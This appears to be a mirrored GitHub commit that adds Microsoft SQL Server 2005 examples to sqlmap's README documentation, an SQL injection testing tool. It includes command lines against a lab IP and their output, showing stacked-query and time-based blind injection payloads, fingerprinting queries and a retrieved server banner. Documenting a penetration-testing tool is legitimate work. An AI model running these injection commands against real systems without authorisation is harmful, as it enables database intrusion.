Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 94c79e3

Browse files
committed
Updated documentation
1 parent dda62ba commit 94c79e3

4 files changed

Lines changed: 211 additions & 2 deletions

File tree

doc/ChangeLog

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -36,8 +36,7 @@ sqlmap (0.6.3-1) stable; urgency=low
3636
headers are set;
3737
* Minor improvement to be able to provide CU (as current user) as user
3838
value (-U) when enumerating users privileges or users passwords;
39-
* Minor improvements to sqlmap Debian package files: sqlmap uploaded
40-
to official Debian project repository, on queue at the moment;
39+
* Minor improvements to sqlmap Debian package files;
4140
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
4241
library if available to speed up the sqlmap algorithmic operations;
4342
* Minor improvement to retry the HTTP request up to three times in case

doc/README.html

Lines changed: 110 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1851,6 +1851,23 @@ <H3>Test for stacked queries (multiple statements) support</H3>
18511851
</CODE></BLOCKQUOTE>
18521852
</P>
18531853

1854+
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
1855+
<P>
1856+
<BLOCKQUOTE><CODE>
1857+
<PRE>
1858+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1859+
--stacked-test -v 1
1860+
1861+
[...]
1862+
back-end DBMS: Microsoft SQL Server 2005
1863+
1864+
[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
1865+
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
1866+
stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
1867+
</PRE>
1868+
</CODE></BLOCKQUOTE>
1869+
</P>
1870+
18541871

18551872
<H3>Test for Time based blind SQL injection</H3>
18561873

@@ -1901,6 +1918,25 @@ <H3>Test for Time based blind SQL injection</H3>
19011918
</CODE></BLOCKQUOTE>
19021919
</P>
19031920

1921+
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
1922+
<P>
1923+
<BLOCKQUOTE><CODE>
1924+
<PRE>
1925+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1926+
--time-test -v 1
1927+
1928+
[...]
1929+
back-end DBMS: Microsoft SQL Server 2005
1930+
1931+
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
1932+
[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
1933+
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
1934+
[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
1935+
time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
1936+
</PRE>
1937+
</CODE></BLOCKQUOTE>
1938+
</P>
1939+
19041940

19051941
<H3>Test for UNION query SQL injection</H3>
19061942

@@ -2289,6 +2325,29 @@ <H3>Extensive database management system fingerprint</H3>
22892325
</CODE></BLOCKQUOTE>
22902326
</P>
22912327

2328+
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
2329+
<P>
2330+
<BLOCKQUOTE><CODE>
2331+
<PRE>
2332+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
2333+
2334+
[...]
2335+
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
2336+
[hh:mm:51] [INFO] testing Microsoft SQL Server
2337+
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
2338+
[hh:mm:51] [INFO] retrieved: 1
2339+
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
2340+
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2341+
[hh:mm:51] [INFO] retrieved: 5
2342+
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
2343+
web server operating system: Windows 2003 or 2000
2344+
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2345+
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2346+
html error message fingerprint: Microsoft SQL Server
2347+
</PRE>
2348+
</CODE></BLOCKQUOTE>
2349+
</P>
2350+
22922351
<P>If you want an even more accurate result, based also on banner parsing,
22932352
you can also provide the <CODE>-b</CODE> or <CODE>--banner</CODE> option.</P>
22942353

@@ -2372,6 +2431,40 @@ <H3>Extensive database management system fingerprint</H3>
23722431
</CODE></BLOCKQUOTE>
23732432
</P>
23742433

2434+
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
2435+
<P>
2436+
<BLOCKQUOTE><CODE>
2437+
<PRE>
2438+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
2439+
2440+
[...]
2441+
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
2442+
[hh:mm:03] [INFO] testing Microsoft SQL Server
2443+
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
2444+
[hh:mm:03] [INFO] retrieved: 1
2445+
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
2446+
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2447+
[hh:mm:03] [INFO] retrieved: 5
2448+
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
2449+
[hh:mm:03] [INFO] query: @@VERSION
2450+
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2451+
Oct 14 2005 00:33:37
2452+
Copyright (c) 1988-2005 Microsoft Corporation
2453+
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2454+
2455+
[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
2456+
web server operating system: Windows 2003 or 2000
2457+
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2458+
back-end DBMS operating system: Windows 2003 Service Pack 1
2459+
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2460+
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
2461+
version 9.00.1399
2462+
html error message fingerprint: Microsoft SQL Server
2463+
[...]
2464+
</PRE>
2465+
</CODE></BLOCKQUOTE>
2466+
</P>
2467+
23752468
<P>As you can see, from the Microsoft SQL Server banner, sqlmap was able to
23762469
correctly identify the database management system patch level.
23772470
The Microsoft SQL Server XML versions file is the result of a sqlmap
@@ -2444,6 +2537,23 @@ <H3>Banner</H3>
24442537
</CODE></BLOCKQUOTE>
24452538
</P>
24462539

2540+
<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
2541+
<P>
2542+
<BLOCKQUOTE><CODE>
2543+
<PRE>
2544+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
2545+
2546+
banner:
2547+
---
2548+
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2549+
Oct 14 2005 00:33:37
2550+
Copyright (c) 1988-2005 Microsoft Corporation
2551+
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2552+
---
2553+
</PRE>
2554+
</CODE></BLOCKQUOTE>
2555+
</P>
2556+
24472557

24482558
<H3>Current user</H3>
24492559

doc/README.pdf

2.63 KB
Binary file not shown.

doc/README.sgml

Lines changed: 100 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL
17911791
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
17921792
</verb></tscreen>
17931793

1794+
<p>
1795+
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
1796+
1797+
<tscreen><verb>
1798+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1799+
--stacked-test -v 1
1800+
1801+
[...]
1802+
back-end DBMS: Microsoft SQL Server 2005
1803+
1804+
[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
1805+
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
1806+
stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
1807+
</verb></tscreen>
1808+
17941809

17951810
<sect2>Test for Time based blind SQL injection
17961811

@@ -1839,6 +1854,23 @@ with stacked query syntax
18391854
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
18401855
</verb></tscreen>
18411856

1857+
<p>
1858+
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
1859+
1860+
<tscreen><verb>
1861+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1862+
--time-test -v 1
1863+
1864+
[...]
1865+
back-end DBMS: Microsoft SQL Server 2005
1866+
1867+
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
1868+
[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
1869+
[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
1870+
[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
1871+
time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
1872+
</verb></tscreen>
1873+
18421874

18431875
<sect2>Test for UNION query SQL injection
18441876

@@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
22212253
html error message fingerprint: Microsoft SQL Server
22222254
</verb></tscreen>
22232255

2256+
<p>
2257+
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2258+
2259+
<tscreen><verb>
2260+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
2261+
2262+
[...]
2263+
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
2264+
[hh:mm:51] [INFO] testing Microsoft SQL Server
2265+
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
2266+
[hh:mm:51] [INFO] retrieved: 1
2267+
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
2268+
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2269+
[hh:mm:51] [INFO] retrieved: 5
2270+
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
2271+
web server operating system: Windows 2003 or 2000
2272+
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2273+
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2274+
html error message fingerprint: Microsoft SQL Server
2275+
</verb></tscreen>
2276+
22242277
<p>
22252278
If you want an even more accurate result, based also on banner parsing,
22262279
you can also provide the <tt>-b</tt> or <tt>--banner</tt> option.
@@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
23022355
[...]
23032356
</verb></tscreen>
23042357

2358+
<p>
2359+
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2360+
2361+
<tscreen><verb>
2362+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
2363+
2364+
[...]
2365+
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
2366+
[hh:mm:03] [INFO] testing Microsoft SQL Server
2367+
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
2368+
[hh:mm:03] [INFO] retrieved: 1
2369+
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
2370+
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2371+
[hh:mm:03] [INFO] retrieved: 5
2372+
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
2373+
[hh:mm:03] [INFO] query: @@VERSION
2374+
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2375+
Oct 14 2005 00:33:37
2376+
Copyright (c) 1988-2005 Microsoft Corporation
2377+
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2378+
2379+
[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
2380+
web server operating system: Windows 2003 or 2000
2381+
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2382+
back-end DBMS operating system: Windows 2003 Service Pack 1
2383+
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2384+
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
2385+
version 9.00.1399
2386+
html error message fingerprint: Microsoft SQL Server
2387+
[...]
2388+
</verb></tscreen>
2389+
23052390
<p>
23062391
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
23072392
correctly identify the database management system patch level.
@@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
23692454
---
23702455
</verb></tscreen>
23712456

2457+
<p>
2458+
Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2459+
2460+
<tscreen><verb>
2461+
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
2462+
2463+
banner:
2464+
---
2465+
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2466+
Oct 14 2005 00:33:37
2467+
Copyright (c) 1988-2005 Microsoft Corporation
2468+
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2469+
---
2470+
</verb></tscreen>
2471+
23722472

23732473
<sect2>Current user
23742474

0 commit comments

Comments
 (0)